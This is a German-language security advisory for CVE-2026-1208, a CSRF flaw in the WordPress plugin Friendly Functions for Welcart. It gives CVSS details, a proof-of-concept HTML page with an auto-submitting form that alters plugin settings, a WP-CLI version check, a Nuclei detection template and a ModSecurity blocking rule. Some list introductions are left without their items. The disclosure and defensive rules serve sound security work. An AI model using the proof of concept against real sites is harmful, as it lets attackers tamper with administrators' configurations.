
Friendly Functions for Welcart <= 1.2.5 - Cross-Site Request Forgery zur Aktualisierung von Einstellungen
Schlüsselwörter: CVE-2026-1208, Schwachstelle in Friendly Functions for Welcart, CSRF, Cross-Site Request Forgery, WordPress-Sicherheit, WordPress-Plugin-Schwachstelle, CWE-352, Welcart-Sicherheit, Einstellungsmanipulation, WordPress CVE 2026
CSRF-Schwachstelle im WordPress-Plugin Friendly Functions for Welcart (CVE-2026-1208) – Sicherheitsfehler, der es nicht authentifizierten Angreifern ermöglicht, Plugin-Einstellungen über gefälschte Anfragen zu ändern.
Im Plugin Friendly Functions for Welcart wurde eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) entdeckt, die es nicht authentifizierten Angreifern ermöglicht, Plugin-Einstellungen zu ändern, indem sie einen Administrator dazu verleiten, auf einen bösartigen Link zu klicken.
Entdeckt von: Kai Aizen (SnailSploit)
Veröffentlicht: 23. Januar 2026
CVSS-Score: 4.3 (Mittel)
CWE: CWE-352 – Cross-Site Request Forgery (CSRF)
Plugin: Friendly Functions for Welcart
Angriffstyp: Cross-Site Request Forgery zur Änderung von Einstellungen
Erforderliche Berechtigungen: Keine (nicht authentifizierter Angriff + Social Engineering)
Das Plugin Friendly Functions for Welcart für WordPress ist in allen Versionen bis einschließlich 1.2.5 anfällig für Cross-Site Request Forgery. Ursache ist eine fehlende oder fehlerhafte Nonce-Validierung auf der Einstellungsseite. Dadurch ist es nicht authentifizierten Angreifern möglich, die Plugin-Einstellungen über eine gefälschte Anfrage zu ändern, sofern sie einen Website-Administrator dazu verleiten können, eine Aktion wie das Klicken auf einen Link auszuführen.
Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
| Metrik | Wert |
|---|---|
| Angriffsvektor | Netzwerk (AV:N) |
| Angriffskomplexität | Niedrig (AC:L) |
| Erforderliche Berechtigungen | Keine (PR:N) |
| Benutzerinteraktion | Erforderlich (UI:R) |
| Auswirkungsbereich | Unverändert (S:U) |
| Vertraulichkeit | Keine (C:N) |
| Integrität | Niedrig (I:L) |
| Verfügbarkeit | Keine (A:N) |
Die Schwachstelle liegt in der Implementierung der Einstellungsseite, wo:
Die Schwachstelle wurde an den folgenden Stellen identifiziert:
ffw_function_settings.php - Zeile 53ffw_function_settings.php - Zeile 58Der Angriff erfordert Social Engineering, um einen authentifizierten Administrator dazu zu bringen, eine bösartige Seite zu besuchen oder einen manipulierten Link zu klicken, während er in seiner WordPress-Website angemeldet ist.
Target: WordPress Admin with Friendly Functions for Welcart installed
Method: Malicious HTML page with auto-submitting form
Trigger: Administrator clicks link or visits attacker-controlled page
<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
<h1>Loading...</h1>
<form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
<input type="hidden" name="ffw_setting_option" value="malicious_value" />
<!-- Add additional setting fields as needed -->
</form>
<script>
document.getElementById('csrf-form').submit();
</script>
</body>
</html>
⚠️ Warnung: Dieser PoC wird nur für Bildungs- und autorisierte Testzwecke bereitgestellt.
# Check if vulnerable version is installed
wp plugin list | grep -i "friendly-functions-for-welcart"
# Get specific version
wp plugin get friendly-functions-for-welcart --field=version
Nuclei-Vorlage:
id: CVE-2026-1208
info:
name: Friendly Functions for Welcart - CSRF to Settings Update
author: SnailSploit
severity: medium
description: |
Friendly Functions for Welcart plugin for WordPress is vulnerable
to CSRF in versions <= 1.2.5 due to missing nonce validation.
reference:
- https://github.com/SnailSploit/CVE-2026-1208
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2026-1208
cwe-id: CWE-352
tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
matchers-condition: and
matchers:
- type: word
words:
- "Friendly Functions for Welcart"
- type: regex
regex:
- "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- "(?i)Stable tag:\\s*([0-9.]+)"
ModSecurity-Regel:
# CVE-2026-1208 - Block CSRF attempts to FFW settings
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule &REQUEST_HEADERS:Referer "@eq 0"